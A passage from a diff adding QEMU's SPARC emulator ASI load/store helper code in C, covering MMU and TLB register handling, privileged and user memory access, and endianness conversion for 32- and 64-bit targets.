write MMU regs */ + case 0x19: /* LEON3 write MMU regs */ + { + int reg = (addr >> 8) & 0x1f; + uint32_t oldreg; + + oldreg = 
env->mmuregs[reg]; + switch (reg) { + case 0: /* Control Register */ + env->mmuregs[reg] = (env->mmuregs[reg] & 0xff000000) | + (val & 0x00ffffff); + /* Mappings generated during no-fault mode or MMU + disabled mode are invalid in normal mode */ + if ((oldreg & (MMU_E | MMU_NF | env->def->mmu_bm)) != + (env->mmuregs[reg] & (MMU_E | MMU_NF | env->def->mmu_bm))) { + tlb_flush(CPU(cpu), 1); + } + break; + case 1: /* Context Table Pointer Register */ + env->mmuregs[reg] = val & env->def->mmu_ctpr_mask; + break; + case 2: /* Context Register */ + env->mmuregs[reg] = val & env->def->mmu_cxr_mask; + if (oldreg != env->mmuregs[reg]) { + /* we flush when the MMU context changes because + QEMU has no MMU context support */ + tlb_flush(CPU(cpu), 1); + } + break; + case 3: /* Synchronous Fault Status Register with Clear */ + case 4: /* Synchronous Fault Address Register */ + break; + case 0x10: /* TLB Replacement Control Register */ + env->mmuregs[reg] = val & env->def->mmu_trcr_mask; + break; + case 0x13: /* Synchronous Fault Status Register with Read + and Clear */ + env->mmuregs[3] = val & env->def->mmu_sfsr_mask; + break; + case 0x14: /* Synchronous Fault Address Register */ + env->mmuregs[4] = val; + break; + default: + env->mmuregs[reg] = val; + break; + } + if (oldreg != env->mmuregs[reg]) { + DPRINTF_MMU("mmu change reg[%d]: 0x%08x -> 0x%08x\n", + reg, oldreg, env->mmuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + } + break; + case 5: /* Turbosparc ITLB Diagnostic */ + case 6: /* Turbosparc DTLB Diagnostic */ + case 7: /* Turbosparc IOTLB Diagnostic */ + break; + case 0xa: /* User data access */ + switch (size) { + case 1: + cpu_stb_user(env, addr, val); + break; + case 2: + cpu_stw_user(env, addr, val); + break; + default: + case 4: + cpu_stl_user(env, addr, val); + break; + case 8: + cpu_stq_user(env, addr, val); + break; + } + break; + case 0xb: /* Supervisor data access */ + case 0x80: + switch (size) { + case 1: + cpu_stb_kernel(env, 
addr, val); + break; + case 2: + cpu_stw_kernel(env, addr, val); + break; + default: + case 4: + cpu_stl_kernel(env, addr, val); + break; + case 8: + cpu_stq_kernel(env, addr, val); + break; + } + break; + case 0xc: /* I-cache tag */ + case 0xd: /* I-cache data */ + case 0xe: /* D-cache tag */ + case 0xf: /* D-cache data */ + case 0x10: /* I/D-cache flush page */ + case 0x11: /* I/D-cache flush segment */ + case 0x12: /* I/D-cache flush region */ + case 0x13: /* I/D-cache flush context */ + case 0x14: /* I/D-cache flush user */ + break; + case 0x17: /* Block copy, sta access */ + { + /* val = src + addr = dst + copy 32 bytes */ + unsigned int i; + uint32_t src = val & ~3, dst = addr & ~3, temp; + + for (i = 0; i < 32; i += 4, src += 4, dst += 4) { + temp = cpu_ldl_kernel(env, src); + cpu_stl_kernel(env, dst, temp); + } + } + break; + case 0x1f: /* Block fill, stda access */ + { + /* addr = dst + fill 32 bytes with val */ + unsigned int i; + uint32_t dst = addr & 7; + + for (i = 0; i < 32; i += 8, dst += 8) { + cpu_stq_kernel(env, dst, val); + } + } + break; + case 0x20: /* MMU passthrough */ + case 0x1c: /* LEON MMU passthrough */ + { + switch (size) { + case 1: + stb_phys(cs->as, addr, val); + break; + case 2: + stw_phys(cs->as, addr, val); + break; + case 4: + default: + stl_phys(cs->as, addr, val); + break; + case 8: + stq_phys(cs->as, addr, val); + break; + } + } + break; + /* MMU passthrough, 0x100000000 to 0xfffffffff */ + case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + { + switch (size) { + case 1: + stb_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 2: + stw_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 4: + default: + stl_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), val); + break; + case 8: + stq_phys(cs->as, (hwaddr)addr + | ((hwaddr)(asi & 0xf) << 32), 
val); + break; + } + } + break; + case 0x30: /* store buffer tags or Turbosparc secondary cache diagnostic */ + case 0x31: /* store buffer data, Ross RT620 I-cache flush or + Turbosparc snoop RAM */ + case 0x32: /* store buffer control or Turbosparc page table + descriptor diagnostic */ + case 0x36: /* I-cache flash clear */ + case 0x37: /* D-cache flash clear */ + break; + case 0x38: /* SuperSPARC MMU Breakpoint Control Registers*/ + { + int reg = (addr >> 8) & 3; + + switch (reg) { + case 0: /* Breakpoint Value (Addr) */ + env->mmubpregs[reg] = (val & 0xfffffffffULL); + break; + case 1: /* Breakpoint Mask */ + env->mmubpregs[reg] = (val & 0xfffffffffULL); + break; + case 2: /* Breakpoint Control */ + env->mmubpregs[reg] = (val & 0x7fULL); + break; + case 3: /* Breakpoint Status */ + env->mmubpregs[reg] = (val & 0xfULL); + break; + } + DPRINTF_MMU("write breakpoint reg[%d] 0x%016x\n", reg, + env->mmuregs[reg]); + } + break; + case 0x49: /* SuperSPARC MMU Counter Breakpoint Value */ + env->mmubpctrv = val & 0xffffffff; + break; + case 0x4a: /* SuperSPARC MMU Counter Breakpoint Control */ + env->mmubpctrc = val & 0x3; + break; + case 0x4b: /* SuperSPARC MMU Counter Breakpoint Status */ + env->mmubpctrs = val & 0x3; + break; + case 0x4c: /* SuperSPARC MMU Breakpoint Action */ + env->mmubpaction = val & 0x1fff; + break; + case 8: /* User code access, XXX */ + case 9: /* Supervisor code access, XXX */ + default: + cpu_unassigned_access(CPU(sparc_env_get_cpu(env)), + addr, true, false, asi, size); + break; + } +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif +} + +#endif /* CONFIG_USER_ONLY */ +#else /* TARGET_SPARC64 */ + +/* returns true if access using this ASI is to have address translated by MMU + otherwise access is to raw physical address */ +static inline int is_translating_asi(int asi) +{ +#ifdef TARGET_SPARC64 + /* Ultrasparc IIi translating asi + - note this list is defined by cpu implementation + */ + if( (asi >= 0x04 && asi <= 0x11) || + 
(asi >= 0x16 && asi <= 0x19) || + (asi >= 0x1E && asi <= 0x1F) || + (asi >= 0x24 && asi <= 0x2C) || + (asi >= 0x70 && asi <= 0x73) || + (asi >= 0x78 && asi <= 0x79) || + (asi >= 0x80 && asi <= 0xFF) ) + { + return 1; + } + else + { + return 0; + } +#else + /* TODO: check sparc32 bits */ + return 0; +#endif +} + +static inline target_ulong address_mask(CPUSPARCState *env1, target_ulong addr) +{ +#ifdef TARGET_SPARC64 + if (AM_CHECK(env1)) { + addr &= 0xffffffffULL; + } +#endif + return addr; +} + +static inline target_ulong asi_address_mask(CPUSPARCState *env, + int asi, target_ulong addr) +{ + if (is_translating_asi(asi)) { + return address_mask(env, addr); + } else { + return addr; + } +} + +#ifdef CONFIG_USER_ONLY +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, int asi, int size, + int sign) +{ + uint64_t ret = 0; +#if defined(DEBUG_ASI) + target_ulong last_addr = addr; +#endif + + if (asi < 0x80) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + switch (asi) { + case 0x82: /* Primary no-fault */ + case 0x8a: /* Primary no-fault LE */ + if (page_check_range(addr, size, PAGE_READ) == -1) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return 0; + } + /* Fall through */ + case 0x80: /* Primary */ + case 0x88: /* Primary LE */ + { + switch (size) { + case 1: + ret = ldub_raw(addr); + break; + case 2: + ret = lduw_raw(addr); + break; + case 4: + ret = ldl_raw(addr); + break; + default: + case 8: + ret = ldq_raw(addr); + break; + } + } + break; + case 0x83: /* Secondary no-fault */ + case 0x8b: /* Secondary no-fault LE */ + if (page_check_range(addr, size, PAGE_READ) == -1) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return 0; + } + /* Fall through */ + case 0x81: /* Secondary */ + case 0x89: /* Secondary LE */ + /* XXX */ + break; + default: + break; + } + + /* Convert from little endian */ + switch 
(asi) { + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0x8a: /* Primary no-fault LE */ + case 0x8b: /* Secondary no-fault LE */ + switch (size) { + case 2: + ret = bswap16(ret); + break; + case 4: + ret = bswap32(ret); + break; + case 8: + ret = bswap64(ret); + break; + default: + break; + } + default: + break; + } + + /* Convert to signed number */ + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} + +void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, + int asi, int size) +{ +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif + if (asi < 0x80) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* Convert to little endian */ + switch (asi) { + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch (size) { + case 2: + val = bswap16(val); + break; + case 4: + val = bswap32(val); + break; + case 8: + val = bswap64(val); + break; + default: + break; + } + default: + break; + } + + switch (asi) { + case 0x80: /* Primary */ + case 0x88: /* Primary LE */ + { + switch (size) { + case 1: + stb_raw(addr, val); + break; + case 2: + stw_raw(addr, val); + break; + case 4: + stl_raw(addr, val); + break; + case 8: + default: + stq_raw(addr, val); + break; + } + } + break; + case 0x81: /* Secondary */ + case 0x89: /* Secondary LE */ + /* XXX */ + return; + + case 0x82: /* Primary no-fault, RO */ + case 0x83: /* Secondary no-fault, RO */ + case 0x8a: /* Primary no-fault LE, RO */ + case 0x8b: /* Secondary no-fault LE, RO */ + default: + helper_raise_exception(env, TT_DATA_ACCESS); + return; + } +} + +#else /* CONFIG_USER_ONLY */ + +uint64_t helper_ld_asi(CPUSPARCState *env, target_ulong addr, 
int asi, int size, + int sign) +{ + CPUState *cs = CPU(sparc_env_get_cpu(env)); + uint64_t ret = 0; +#if defined(DEBUG_ASI) + target_ulong last_addr = addr; +#endif + + asi &= 0xff; + + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* process nonfaulting loads first */ + if ((asi & 0xf6) == 0x82) { + int mmu_idx; + + /* secondary space access has lowest asi bit equal to 1 */ + if (env->pstate & PS_PRIV) { + mmu_idx = (asi & 1) ? MMU_KERNEL_SECONDARY_IDX : MMU_KERNEL_IDX; + } else { + mmu_idx = (asi & 1) ? MMU_USER_SECONDARY_IDX : MMU_USER_IDX; + } + + if (cpu_get_phys_page_nofault(env, addr, mmu_idx) == (0-1ULL)) { +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + /* env->exception_index is set in get_physical_address_data(). */ + helper_raise_exception(env, cs->exception_index); + } + + /* convert nonfaulting load ASIs to normal load ASIs */ + asi &= ~0x02; + } + + switch (asi) { + case 0x10: /* As if user primary */ + case 0x11: /* As if user secondary */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x80: /* Primary */ + case 0x81: /* Secondary */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0xe2: /* UA2007 Primary block init */ + case 0xe3: /* UA2007 Secondary block init */ + if ((asi & 0x80) && (env->pstate & PS_PRIV)) { + if (cpu_hypervisor_mode(env)) { + switch (size) { + case 1: + ret = cpu_ldub_hypv(env, addr); + break; + case 2: + ret = cpu_lduw_hypv(env, addr); + break; + case 4: + ret = cpu_ldl_hypv(env, addr); + break; + default: + case 8: + ret = cpu_ldq_hypv(env, addr); + break; + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + ret = 
cpu_ldub_kernel_secondary(env, addr); + break; + case 2: + ret = cpu_lduw_kernel_secondary(env, addr); + break; + case 4: + ret = cpu_ldl_kernel_secondary(env, addr); + break; + default: + case 8: + ret = cpu_ldq_kernel_secondary(env, addr); + break; + } + } else { + switch (size) { + case 1: + ret = cpu_ldub_kernel(env, addr); + break; + case 2: + ret = cpu_lduw_kernel(env, addr); + break; + case 4: + ret = cpu_ldl_kernel(env, addr); + break; + default: + case 8: + ret = cpu_ldq_kernel(env, addr); + break; + } + } + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + ret = cpu_ldub_user_secondary(env, addr); + break; + case 2: + ret = cpu_lduw_user_secondary(env, addr); + break; + case 4: + ret = cpu_ldl_user_secondary(env, addr); + break; + default: + case 8: + ret = cpu_ldq_user_secondary(env, addr); + break; + } + } else { + switch (size) { + case 1: + ret = cpu_ldub_user(env, addr); + break; + case 2: + ret = cpu_lduw_user(env, addr); + break; + case 4: + ret = cpu_ldl_user(env, addr); + break; + default: + case 8: + ret = cpu_ldq_user(env, addr); + break; + } + } + } + break; + case 0x14: /* Bypass */ + case 0x15: /* Bypass, non-cacheable */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + { + switch (size) { + case 1: + ret = ldub_phys(cs->as, addr); + break; + case 2: + ret = lduw_phys(cs->as, addr); + break; + case 4: + ret = ldl_phys(cs->as, addr); + break; + default: + case 8: + ret = ldq_phys(cs->as, addr); + break; + } + break; + } + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE + Only ldda allowed */ + helper_raise_exception(env, TT_ILL_INSN); + return 0; + case 0x04: /* Nucleus */ + case 0x0c: /* Nucleus Little Endian (LE) */ + { + switch (size) { + case 1: + ret = cpu_ldub_nucleus(env, addr); + break; + case 2: + ret = cpu_lduw_nucleus(env, addr); + break; + case 4: + ret = cpu_ldl_nucleus(env, addr); + 
break; + default: + case 8: + ret = cpu_ldq_nucleus(env, addr); + break; + } + break; + } + case 0x4a: /* UPA config */ + /* XXX */ + break; + case 0x45: /* LSU */ + ret = env->lsu; + break; + case 0x50: /* I-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + + if (reg == 0) { + /* I-TSB Tag Target register */ + ret = ultrasparc_tag_target(env->immu.tag_access); + } else { + ret = env->immuregs[reg]; + } + + break; + } + case 0x51: /* I-MMU 8k TSB pointer */ + { + /* env->immuregs[5] holds I-MMU TSB register value + env->immuregs[6] holds I-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->immu.tsb, env->immu.tag_access, + 8*1024); + break; + } + case 0x52: /* I-MMU 64k TSB pointer */ + { + /* env->immuregs[5] holds I-MMU TSB register value + env->immuregs[6] holds I-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->immu.tsb, env->immu.tag_access, + 64*1024); + break; + } + case 0x55: /* I-MMU data access */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->itlb[reg].tte; + break; + } + case 0x56: /* I-MMU tag read */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->itlb[reg].tag; + break; + } + case 0x58: /* D-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + + if (reg == 0) { + /* D-TSB Tag Target register */ + ret = ultrasparc_tag_target(env->dmmu.tag_access); + } else { + ret = env->dmmuregs[reg]; + } + break; + } + case 0x59: /* D-MMU 8k TSB pointer */ + { + /* env->dmmuregs[5] holds D-MMU TSB register value + env->dmmuregs[6] holds D-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->dmmu.tsb, env->dmmu.tag_access, + 8*1024); + break; + } + case 0x5a: /* D-MMU 64k TSB pointer */ + { + /* env->dmmuregs[5] holds D-MMU TSB register value + env->dmmuregs[6] holds D-MMU Tag Access register value */ + ret = ultrasparc_tsb_pointer(env->dmmu.tsb, env->dmmu.tag_access, + 64*1024); + break; + } + case 0x5d: /* D-MMU data access */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->dtlb[reg].tte; + break; + } + 
case 0x5e: /* D-MMU tag read */ + { + int reg = (addr >> 3) & 0x3f; + + ret = env->dtlb[reg].tag; + break; + } + case 0x48: /* Interrupt dispatch, RO */ + break; + case 0x49: /* Interrupt data receive */ + ret = env->ivec_status; + break; + case 0x7f: /* Incoming interrupt vector, RO */ + { + int reg = (addr >> 4) & 0x3; + if (reg < 3) { + ret = env->ivec_data[reg]; + } + break; + } + case 0x46: /* D-cache data */ + case 0x47: /* D-cache tag access */ + case 0x4b: /* E-cache error enable */ + case 0x4c: /* E-cache asynchronous fault status */ + case 0x4d: /* E-cache asynchronous fault address */ + case 0x4e: /* E-cache tag data */ + case 0x66: /* I-cache instruction access */ + case 0x67: /* I-cache tag access */ + case 0x6e: /* I-cache predecode */ + case 0x6f: /* I-cache LRU etc. */ + case 0x76: /* E-cache tag */ + case 0x7e: /* E-cache tag */ + break; + case 0x5b: /* D-MMU data pointer */ + case 0x54: /* I-MMU data in, WO */ + case 0x57: /* I-MMU demap, WO */ + case 0x5c: /* D-MMU data in, WO */ + case 0x5f: /* D-MMU demap, WO */ + case 0x77: /* Interrupt vector, WO */ + default: + cpu_unassigned_access(cs, addr, false, false, 1, size); + ret = 0; + break; + } + + /* Convert from little endian */ + switch (asi) { + case 0x0c: /* Nucleus Little Endian (LE) */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch(size) { + case 2: + ret = bswap16(ret); + break; + case 4: + ret = bswap32(ret); + break; + case 8: + ret = bswap64(ret); + break; + default: + break; + } + default: + break; + } + + /* Convert to signed number */ + if (sign) { + switch (size) { + case 1: + ret = (int8_t) ret; + break; + case 2: + ret = (int16_t) ret; + break; + case 4: + ret = (int32_t) ret; + break; + default: + break; + } + } +#ifdef DEBUG_ASI + dump_asi("read ", last_addr, asi, size, ret); +#endif + return ret; +} 
+ +void helper_st_asi(CPUSPARCState *env, target_ulong addr, target_ulong val, + int asi, int size) +{ + SPARCCPU *cpu = sparc_env_get_cpu(env); + CPUState *cs = CPU(cpu); + +#ifdef DEBUG_ASI + dump_asi("write", addr, asi, size, val); +#endif + + asi &= 0xff; + + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + helper_check_align(env, addr, size - 1); + addr = asi_address_mask(env, asi, addr); + + /* Convert to little endian */ + switch (asi) { + case 0x0c: /* Nucleus Little Endian (LE) */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + switch (size) { + case 2: + val = bswap16(val); + break; + case 4: + val = bswap32(val); + break; + case 8: + val = bswap64(val); + break; + default: + break; + } + default: + break; + } + + switch (asi) { + case 0x10: /* As if user primary */ + case 0x11: /* As if user secondary */ + case 0x18: /* As if user primary LE */ + case 0x19: /* As if user secondary LE */ + case 0x80: /* Primary */ + case 0x81: /* Secondary */ + case 0x88: /* Primary LE */ + case 0x89: /* Secondary LE */ + case 0xe2: /* UA2007 Primary block init */ + case 0xe3: /* UA2007 Secondary block init */ + if ((asi & 0x80) && (env->pstate & PS_PRIV)) { + if (cpu_hypervisor_mode(env)) { + switch (size) { + case 1: + cpu_stb_hypv(env, addr, val); + break; + case 2: + cpu_stw_hypv(env, addr, val); + break; + case 4: + cpu_stl_hypv(env, addr, val); + break; + case 8: + default: + cpu_stq_hypv(env, addr, val); + break; + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + cpu_stb_kernel_secondary(env, addr, val); + break; + case 2: + cpu_stw_kernel_secondary(env, addr, val); + break; + 
case 4: + cpu_stl_kernel_secondary(env, addr, val); + break; + case 8: + default: + cpu_stq_kernel_secondary(env, addr, val); + break; + } + } else { + switch (size) { + case 1: + cpu_stb_kernel(env, addr, val); + break; + case 2: + cpu_stw_kernel(env, addr, val); + break; + case 4: + cpu_stl_kernel(env, addr, val); + break; + case 8: + default: + cpu_stq_kernel(env, addr, val); + break; + } + } + } + } else { + /* secondary space access has lowest asi bit equal to 1 */ + if (asi & 1) { + switch (size) { + case 1: + cpu_stb_user_secondary(env, addr, val); + break; + case 2: + cpu_stw_user_secondary(env, addr, val); + break; + case 4: + cpu_stl_user_secondary(env, addr, val); + break; + case 8: + default: + cpu_stq_user_secondary(env, addr, val); + break; + } + } else { + switch (size) { + case 1: + cpu_stb_user(env, addr, val); + break; + case 2: + cpu_stw_user(env, addr, val); + break; + case 4: + cpu_stl_user(env, addr, val); + break; + case 8: + default: + cpu_stq_user(env, addr, val); + break; + } + } + } + break; + case 0x14: /* Bypass */ + case 0x15: /* Bypass, non-cacheable */ + case 0x1c: /* Bypass LE */ + case 0x1d: /* Bypass, non-cacheable LE */ + { + switch (size) { + case 1: + stb_phys(cs->as, addr, val); + break; + case 2: + stw_phys(cs->as, addr, val); + break; + case 4: + stl_phys(cs->as, addr, val); + break; + case 8: + default: + stq_phys(cs->as, addr, val); + break; + } + } + return; + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE + Only ldda allowed */ + helper_raise_exception(env, TT_ILL_INSN); + return; + case 0x04: /* Nucleus */ + case 0x0c: /* Nucleus Little Endian (LE) */ + { + switch (size) { + case 1: + cpu_stb_nucleus(env, addr, val); + break; + case 2: + cpu_stw_nucleus(env, addr, val); + break; + case 4: + cpu_stl_nucleus(env, addr, val); + break; + default: + case 8: + cpu_stq_nucleus(env, addr, val); + break; + } + break; + } + + case 0x4a: /* UPA config */ + /* XXX */ + return; + 
case 0x45: /* LSU */ + { + uint64_t oldreg; + + oldreg = env->lsu; + env->lsu = val & (DMMU_E | IMMU_E); + /* Mappings generated during D/I MMU disabled mode are + invalid in normal mode */ + if (oldreg != env->lsu) { + DPRINTF_MMU("LSU change: 0x%" PRIx64 " -> 0x%" PRIx64 "\n", + oldreg, env->lsu); +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + tlb_flush(CPU(cpu), 1); + } + return; + } + case 0x50: /* I-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + uint64_t oldreg; + + oldreg = env->immuregs[reg]; + switch (reg) { + case 0: /* RO */ + return; + case 1: /* Not in I-MMU */ + case 2: + return; + case 3: /* SFSR */ + if ((val & 1) == 0) { + val = 0; /* Clear SFSR */ + } + env->immu.sfsr = val; + break; + case 4: /* RO */ + return; + case 5: /* TSB access */ + DPRINTF_MMU("immu TSB write: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", env->immu.tsb, val); + env->immu.tsb = val; + break; + case 6: /* Tag access */ + env->immu.tag_access = val; + break; + case 7: + case 8: + return; + default: + break; + } + + if (oldreg != env->immuregs[reg]) { + DPRINTF_MMU("immu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", reg, oldreg, env->immuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x54: /* I-MMU data in */ + replace_tlb_1bit_lru(env->itlb, env->immu.tag_access, val, "immu", env); + return; + case 0x55: /* I-MMU data access */ + { + /* TODO: auto demap */ + + unsigned int i = (addr >> 3) & 0x3f; + + replace_tlb_entry(&env->itlb[i], env->immu.tag_access, val, env); + +#ifdef DEBUG_MMU + DPRINTF_MMU("immu data access replaced entry [%i]\n", i); + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x57: /* I-MMU demap */ + demap_tlb(env->itlb, addr, "immu", env); + return; + case 0x58: /* D-MMU regs */ + { + int reg = (addr >> 3) & 0xf; + uint64_t oldreg; + + oldreg = env->dmmuregs[reg]; + switch (reg) { + case 0: /* RO */ + case 4: + return; + case 3: /* SFSR */ + if ((val & 1) == 0) { + val 
= 0; /* Clear SFSR, Fault address */ + env->dmmu.sfar = 0; + } + env->dmmu.sfsr = val; + break; + case 1: /* Primary context */ + env->dmmu.mmu_primary_context = val; + /* can be optimized to only flush MMU_USER_IDX + and MMU_KERNEL_IDX entries */ + tlb_flush(CPU(cpu), 1); + break; + case 2: /* Secondary context */ + env->dmmu.mmu_secondary_context = val; + /* can be optimized to only flush MMU_USER_SECONDARY_IDX + and MMU_KERNEL_SECONDARY_IDX entries */ + tlb_flush(CPU(cpu), 1); + break; + case 5: /* TSB access */ + DPRINTF_MMU("dmmu TSB write: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", env->dmmu.tsb, val); + env->dmmu.tsb = val; + break; + case 6: /* Tag access */ + env->dmmu.tag_access = val; + break; + case 7: /* Virtual Watchpoint */ + case 8: /* Physical Watchpoint */ + default: + env->dmmuregs[reg] = val; + break; + } + + if (oldreg != env->dmmuregs[reg]) { + DPRINTF_MMU("dmmu change reg[%d]: 0x%016" PRIx64 " -> 0x%016" + PRIx64 "\n", reg, oldreg, env->dmmuregs[reg]); + } +#ifdef DEBUG_MMU + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x5c: /* D-MMU data in */ + replace_tlb_1bit_lru(env->dtlb, env->dmmu.tag_access, val, "dmmu", env); + return; + case 0x5d: /* D-MMU data access */ + { + unsigned int i = (addr >> 3) & 0x3f; + + replace_tlb_entry(&env->dtlb[i], env->dmmu.tag_access, val, env); + +#ifdef DEBUG_MMU + DPRINTF_MMU("dmmu data access replaced entry [%i]\n", i); + dump_mmu(stdout, fprintf, env); +#endif + return; + } + case 0x5f: /* D-MMU demap */ + demap_tlb(env->dtlb, addr, "dmmu", env); + return; + case 0x49: /* Interrupt data receive */ + env->ivec_status = val & 0x20; + return; + case 0x46: /* D-cache data */ + case 0x47: /* D-cache tag access */ + case 0x4b: /* E-cache error enable */ + case 0x4c: /* E-cache asynchronous fault status */ + case 0x4d: /* E-cache asynchronous fault address */ + case 0x4e: /* E-cache tag data */ + case 0x66: /* I-cache instruction access */ + case 0x67: /* I-cache tag access */ + case 0x6e: /* 
I-cache predecode */ + case 0x6f: /* I-cache LRU etc. */ + case 0x76: /* E-cache tag */ + case 0x7e: /* E-cache tag */ + return; + case 0x51: /* I-MMU 8k TSB pointer, RO */ + case 0x52: /* I-MMU 64k TSB pointer, RO */ + case 0x56: /* I-MMU tag read, RO */ + case 0x59: /* D-MMU 8k TSB pointer, RO */ + case 0x5a: /* D-MMU 64k TSB pointer, RO */ + case 0x5b: /* D-MMU data pointer, RO */ + case 0x5e: /* D-MMU tag read, RO */ + case 0x48: /* Interrupt dispatch, RO */ + case 0x7f: /* Incoming interrupt vector, RO */ + case 0x82: /* Primary no-fault, RO */ + case 0x83: /* Secondary no-fault, RO */ + case 0x8a: /* Primary no-fault LE, RO */ + case 0x8b: /* Secondary no-fault LE, RO */ + default: + cpu_unassigned_access(cs, addr, true, false, 1, size); + return; + } +} +#endif /* CONFIG_USER_ONLY */ + +void helper_ldda_asi(CPUSPARCState *env, target_ulong addr, int asi, int rd) +{ + if ((asi < 0x80 && (env->pstate & PS_PRIV) == 0) + || (cpu_has_hypervisor(env) + && asi >= 0x30 && asi < 0x80 + && !(env->hpstate & HS_PRIV))) { + helper_raise_exception(env, TT_PRIV_ACT); + } + + addr = asi_address_mask(env, asi, addr); + + switch (asi) { +#if !defined(CONFIG_USER_ONLY) + case 0x24: /* Nucleus quad LDD 128 bit atomic */ + case 0x2c: /* Nucleus quad LDD 128 bit atomic LE */ + helper_check_align(env, addr, 0xf); + if (rd == 0) { + env->gregs[1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->gregs[1]); + } + } else if (rd < 8) { + env->gregs[rd] = cpu_ldq_nucleus(env, addr); + env->gregs[rd + 1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->gregs[rd]); + bswap64s(&env->gregs[rd + 1]); + } + } else { + env->regwptr[rd] = cpu_ldq_nucleus(env, addr); + env->regwptr[rd + 1] = cpu_ldq_nucleus(env, addr + 8); + if (asi == 0x2c) { + bswap64s(&env->regwptr[rd]); + bswap64s(&env->regwptr[rd + 1]); + } + } + break; +#endif + default: + helper_check_align(env, addr, 0x3); + if (rd == 0) { + env->gregs[1] = helper_ld_asi(env, addr + 4, asi, 
